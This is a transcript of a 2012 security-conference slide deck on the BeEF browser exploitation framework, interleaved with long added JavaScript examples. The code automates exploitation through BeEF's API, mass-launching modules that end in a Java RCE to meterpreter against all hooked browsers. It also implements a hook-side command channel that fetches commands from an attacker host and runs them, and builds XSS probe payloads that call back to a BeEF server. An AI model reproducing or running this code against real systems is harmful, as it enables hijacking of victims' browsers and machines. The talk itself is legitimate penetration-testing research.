Advances in BeEF - AthCon2012
1. Advances in BeEF
RESTful API, WebSockets, XssRays
Michele “antisnatchor” Orrù
2012 - Athens - 4 May 2012
Saturday, May 5, 12
2. Who am I?
- Senior Security Consultant @ Trustwave SpiderLabs
- BeEF lead core developer
- Application Security researcher
- OpenBSD, Ruby and JavaScript addict
- @antisnatchor
- http://antisnatchor.com
3. What is BeEF?
Browser Exploitation Framework
Powerful platform for Client-side pwnage, XSS
post-exploitation and generally victim browser
security-context abuse.
The framework allows the penetration tester to
select specific modules (in real-time) to target
each browser, and therefore each context.
6. Outline
I. The need to be RESTful: the new API
II. The need to be speedy: WebSockets support
III. I want more XSSs: XssRays enhancements
IV. demos and fun :D
7. The need to be RESTful
- I hate SOAP
- I hate XML-RPC
- I love to use protocol
(HTTP) features without
reinventing the wheel
8. The need to be RESTful
Ruby + Sinatra + JSON = WIN
require 'sinatra'
get '/to/a/pub' do   # GET /to/a/pub answers with a plain-text body
  "BeER please"
end
9. The need to be RESTful
- programmatically control BeEF from anything that speaks HTTP and JSON (bash + curl?)
- facilitate integration with third-party tools (ZAP?)
- create your own custom UI/GUI (mobile?)
10. The need to be RESTful
More info:
- http://blog.beefproject.com/2012/03/restful-api-from-antisnatchor-with-love.html
- http://blog.beefproject.com/2012/03/restful-api-demo.html
Read the doc, you lazy!
- https://github.com/beefproject/beef/wiki/BeEF-RESTful-API
11. The need to be RESTful
Demo time
Pwn hooked browsers running JDK <= 1.6.0_27
I. get the hooked browsers' type/version/OS/plugins
II. if browserIsIE
      createOverlayIframe(Above)
    else
      launchManInTheBrowser
    end
III. if javaEnabled then launchGetSystemInfo
IV. if JDK <= 1.6.0_27 then launchRhinoRCE
V. enjoy the Java meterpreter
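The demo above driven through the RESTful API (slides 9 and 11), as an added Node.js example that is not BeEF's own code. Endpoint paths and the shapes of the login and hook-listing responses follow the BeEF RESTful API wiki page linked above; the BeEF address, the module names, the key names read from a hook's details and the command_id field are assumptions to check against a running instance (GET /api/modules lists the real module names). Only the version check and the module plan run without a BeEF instance; the JDK cut-off is the one on the slide (the Rhino script-engine bug, CVE-2011-3544, fixed in Java 6 Update 29).

```javascript
// Added example, not BeEF's own code. Requires Node 18+ (global fetch).
const BEEF = 'http://127.0.0.1:3000'; // assumed BeEF address

// Build an API URL; every authenticated call carries the session token as ?token=
function apiUrl(path, token) {
  const u = new URL(path, BEEF);
  if (token) u.searchParams.set('token', token);
  return u.toString();
}

async function api(method, path, token, body) {
  const res = await fetch(apiUrl(path, token), {
    method,
    headers: { 'Content-Type': 'application/json' },
    body: body === undefined ? undefined : JSON.stringify(body),
  });
  if (!res.ok) throw new Error(`${method} ${path} -> HTTP ${res.status}`);
  return res.json();
}

// POST /api/admin/login -> {"success":true,"token":"..."} (per the wiki)
async function login(username = 'beef', password = 'beef') {
  const r = await api('POST', '/api/admin/login', null, { username, password });
  if (!r.success) throw new Error('login failed');
  return r.token;
}

// GET /api/hooks -> {"hooked-browsers":{"online":{...},"offline":{...}}} (per the wiki)
async function onlineHooks(token) {
  const r = await api('GET', '/api/hooks', token);
  return Object.values(r['hooked-browsers'].online);
}

// GET /api/hooks/<session> -> fingerprint of one hooked browser
const hookDetails = (token, session) => api('GET', `/api/hooks/${session}`, token);

// GET /api/modules lists modules with numeric ids; resolve a module by its name
async function moduleIdByName(token, name) {
  const mods = Object.values(await api('GET', '/api/modules', token));
  const m = mods.find((x) => x.name === name);
  if (!m) throw new Error(`module not found: ${name}`);
  return m.id;
}

// POST /api/modules/<session>/<module_id> with the module's parameters as JSON
async function launch(token, session, name, params = {}) {
  const id = await moduleIdByName(token, name);
  return api('POST', `/api/modules/${session}/${id}`, token, params);
}

// True when the reported JDK is at or below 1.6.0_27 (the slide's cut-off).
// Version strings look like "1.6.0_27"; compare component by component.
function jdkVulnerable(version, lastBad = '1.6.0_27') {
  if (!version) return false;
  const parse = (v) => String(v).split(/[._]/).map(Number);
  const cur = parse(version), ref = parse(lastBad);
  if (cur.some(Number.isNaN)) return false;
  for (let i = 0; i < Math.max(cur.length, ref.length); i++) {
    const a = cur[i] || 0, b = ref[i] || 0;
    if (a !== b) return a < b;
  }
  return true; // exactly 1.6.0_27
}

// Steps II-IV of the demo as a pure decision, checkable without BeEF.
// `details` is the /api/hooks/<session> hash; BrowserName/JavaEnabled keys and
// the module names are assumptions.
function planModules(details, jdkVersion) {
  const plan = [];
  plan.push(details.BrowserName === 'IE' ? 'Overlay iFrame (Above)' : 'Man-In-The-Browser'); // II
  if (details.JavaEnabled === 'Yes') {
    plan.push('Get System Info');                                   // III
    if (jdkVulnerable(jdkVersion)) plan.push('Java Rhino Exploit'); // IV
  }
  return plan;
}

// Step I plus the plan, against every online zombie. JavaVersion is assumed to
// be available on the hook; in practice it comes back from Get System Info.
async function runDemo() {
  const token = await login();
  for (const hook of await onlineHooks(token)) {
    const d = await hookDetails(token, hook.session);
    for (const name of planModules(d, d.JavaVersion)) {
      const r = await launch(token, hook.session, name);
      console.log(`${hook.session} ${d.BrowserName}/${d.OsName}: ${name} -> command ${r.command_id}`);
    }
  }
}
```

Step III precedes step IV in the demo because the JDK version is something only the Get System Info module can report; a real run would poll that command's result through the module-result endpoint documented on the wiki before deciding on step IV, which the loop above leaves out.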
12. The need to be speedy: WS
BeEF's communication channel uses XHR polling
Pros:
- works everywhere (we support IE, Chrome, Safari, Firefox, Opera and mobile browsers)
Cons:
- inefficient: every poll is a full HTTP request/response, so most of the traffic is headers rather than payload
13. The need to be speedy: WS
Meet WebSocket support in BeEF
[diagram: XHR-polling]
14. The need to be speedy: WS
Meet WebSocket support in BeEF
[diagram: XHR-polling next to WebSockets]
15. The need to be speedy: WS
If beef.browser.hasWebSocket() returns true, don't use XHR polling: open a WebSocket channel instead
currently supported: Firefox, Chrome, Safari
also MozWebSocket (damn prefixes #$*(%$)
the server side speaks hixie-75, hixie-76, hybi-07 and hybi-10
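The channel selection from slide 15 as hook-side JavaScript, an added example rather than BeEF's own hook code. The window object is passed in as win so the logic can be exercised outside a browser; the ws:// and polling paths, the poll interval and the JSON command/result shapes are assumptions, not BeEF's real wire format.

```javascript
// Added example, not BeEF's hook code. `win` is the browser window in practice.

// Firefox 6 to 10 shipped the prefixed MozWebSocket only, hence the second check.
function webSocketCtor(win) {
  if (typeof win.WebSocket === 'function') return win.WebSocket;
  if (typeof win.MozWebSocket === 'function') return win.MozWebSocket;
  return null;
}

function hasWebSocket(win) {
  return webSocketCtor(win) !== null;
}

// Commands are assumed to arrive as JSON {"id": n, "js": "..."} on either
// channel; `onCommand` gets the parsed object and returns the result to send back.
class WebSocketChannel {
  constructor(win, url, session, onCommand) {
    this.name = 'websocket';
    const Ctor = webSocketCtor(win);
    this.sock = new Ctor(url);
    // announce the hook session once, then just wait for pushed commands
    this.sock.onopen = () => this.sock.send(JSON.stringify({ session }));
    this.sock.onmessage = (ev) => {
      const cmd = JSON.parse(ev.data);
      this.sock.send(JSON.stringify({ session, id: cmd.id, result: onCommand(cmd) }));
    };
  }
}

// Fallback: ask the server for pending commands on a timer and POST results back.
class XhrPollingChannel {
  constructor(win, url, session, onCommand, intervalMs = 1000) {
    this.name = 'xhr-polling';
    Object.assign(this, { win, url, session, onCommand, intervalMs });
  }

  // one round trip: GET pending commands (a JSON array), run each, POST each result
  poll() {
    const xhr = new this.win.XMLHttpRequest();
    xhr.open('GET', `${this.url}?session=${encodeURIComponent(this.session)}`, true);
    xhr.onreadystatechange = () => {
      if (xhr.readyState !== 4 || xhr.status !== 200) return;
      for (const cmd of JSON.parse(xhr.responseText)) {
        const post = new this.win.XMLHttpRequest();
        post.open('POST', this.url, true);
        post.send(JSON.stringify({ session: this.session, id: cmd.id, result: this.onCommand(cmd) }));
      }
    };
    xhr.send(null);
  }

  start() {
    this.timer = this.win.setInterval(() => this.poll(), this.intervalMs);
  }
}

// Pick the channel: WebSocket when the browser has one, XHR polling otherwise.
// Paths /ws and /poll are assumptions.
function openChannel(win, beefHost, session, onCommand) {
  if (hasWebSocket(win)) {
    return new WebSocketChannel(win, `ws://${beefHost}/ws`, session, onCommand);
  }
  return new XhrPollingChannel(win, `http://${beefHost}/poll`, session, onCommand);
}
```

The two classes expose the same contract to the rest of the hook, so the modules never need to know which transport is in use; only openChannel does the feature detection.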
16. The need to be speedy: WS
still experimental in BeEF (bugfixing/testing phase)
clone https://github.com/radoen/beef-radoen to give it a try
opens a whole new range of possible features:
- real-time VNC-like hooked browser control
- faster Tunneling Proxy (fuzzing through the hooked browser 4 to 5 times faster)
- generally faster communication
17. The need to be speedy: WS
demo time
- launch 1000 return_long_string modules, once over plain XHR polling and once over WebSockets, and compare the time taken
18. I want more XSSs:
XssRays
Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner, then integrated into BeEF.
XssRays parses all the links and forms of the page it is loaded in and checks for XSS in GET and POST parameters, and also in the URI path, by loading each test request in a hidden iFrame.
Who uses FrameBusting/X-Frame-Options out there :-)? (If the target does, the probe iFrame never renders, the injected script never runs, and that test is silently lost.)
19. I want more XSSs:
XssRays
We inject a vector that contacts BeEF back only if the injected JS actually executes, which is what confirms the XSS. That also makes the results false-positive free.
False negatives are possible, since we inject the vectors blindly.
Basically, the vector sets the document.location.href of the hidden iFrame that carries it to a known BeEF resource, so a request for that resource is the confirmation.
21. I want more XSSs:
XssRays
It also works cross-domain
(respecting the SOP)
22. I want more XSSs:
XssRays
Enhancements from previous months:
- added more attack vectors:
  double URL encoded, double nibble, DOM-based injections
- added Chrome/Safari support:
  base64'ing the iFrame src in order to bypass the XSS filter
- added IE6 to IE9 support:
  did you know that in IE6 location.pathname doesn't contain the first forward slash? (thanks Gareth)
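The mechanism from slide 19 together with the IE6 pathname fix and the double-encoding vector from slide 22, as an added JavaScript example that is not XssRays' own code. The callback path under BeEF, the vector set, the probe-id format and the hook-server address are assumptions; fireProbes expects a browser document and is the only part that does not run outside one.

```javascript
// Added example, not XssRays' code. One probe URL per (parameter, vector) pair;
// a vector that executes points the hidden iframe at a BeEF resource whose path
// names the page, the parameter and the vector, so the server confirms the XSS
// only when the payload actually ran.
const BEEF_BASE = 'http://beef.example:3000'; // assumed hook server (constructed)

function callbackUrl(probeId) {
  return `${BEEF_BASE}/xssrays/${encodeURIComponent(probeId)}`;
}

// The JS that has to execute in the victim page for a hit to be reported.
// Single quotes so it survives inside a double-quoted HTML attribute.
function payloadJs(probeId) {
  return `location.href='${callbackUrl(probeId)}'`;
}

// Vector builders. `double` is URL-encoded here and again when placed in the
// query string, which is what a back end that decodes twice will unwrap.
const VECTORS = {
  plain:  (js) => `"><script>${js}</script>`,
  double: (js) => encodeURIComponent(`"><script>${js}</script>`),
  event:  (js) => `"><img src=x onerror="${js}">`,
};

// IE6 reports location.pathname without the leading slash; normalize it so the
// probe id is the same on every browser.
function normalizePathname(p) {
  return p.startsWith('/') ? p : `/${p}`;
}

function probeId(u, param, vector) {
  return `${u.hostname}${normalizePathname(u.pathname)}|${param}|${vector}`;
}

// Enumerate the GET parameters of a page URL and build the probe list. POST
// form fields and path segments follow the same pattern with the vector placed
// there instead of in the query.
function probesFor(pageUrl) {
  const u = new URL(pageUrl);
  const probes = [];
  for (const name of new Set(u.searchParams.keys())) {
    for (const [vname, build] of Object.entries(VECTORS)) {
      const id = probeId(u, name, vname);
      const test = new URL(pageUrl);
      test.searchParams.set(name, build(payloadJs(id)));
      probes.push({ param: name, vector: vname, probeId: id, url: test.toString() });
    }
  }
  return probes;
}

// Hook side: load every probe in a hidden iframe (`doc` is the page's document).
function fireProbes(doc, probes) {
  for (const p of probes) {
    const f = doc.createElement('iframe');
    f.style.display = 'none';
    f.src = p.url;
    doc.body.appendChild(f);
  }
}

// Server side: a request for the callback path is proof of execution. Returns
// which page/parameter/vector produced the hit, or null for unrelated requests.
function confirmHit(requestPath) {
  const m = /^\/xssrays\/([^/?]+)$/.exec(requestPath);
  if (!m) return null;
  const [page, param, vector] = decodeURIComponent(m[1]).split('|');
  if (!page || !param || !vector) return null;
  return { page, param, vector };
}
```

Because the confirmation is a request the victim browser makes only after the injected script ran, a probe that is reflected but neutralised (encoded output, a filter, an iframe refused by X-Frame-Options) simply never reports, which is the false-negative side of the trade-off described on slide 19.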
23. Thanks
Thanks to my BeEFfy friends: Wade, Christian, Brendan,
Javier, Saafan, Graziano, Ben W., Ben P., Pipes and anyone I may
have forgotten
Our new blogger Heather P.
SpiderLabs because I don’t have to take holidays to be here
Special thanks to Kyprianos and Chris
24. Thanks
follow us: @beefproject
main site: http://beefproject.com
the new blog: http://blog.beefproject.com
github page: https://github.com/beefproject/beef
(Please note: we’ll not pay you. You know we love OpenSource :-)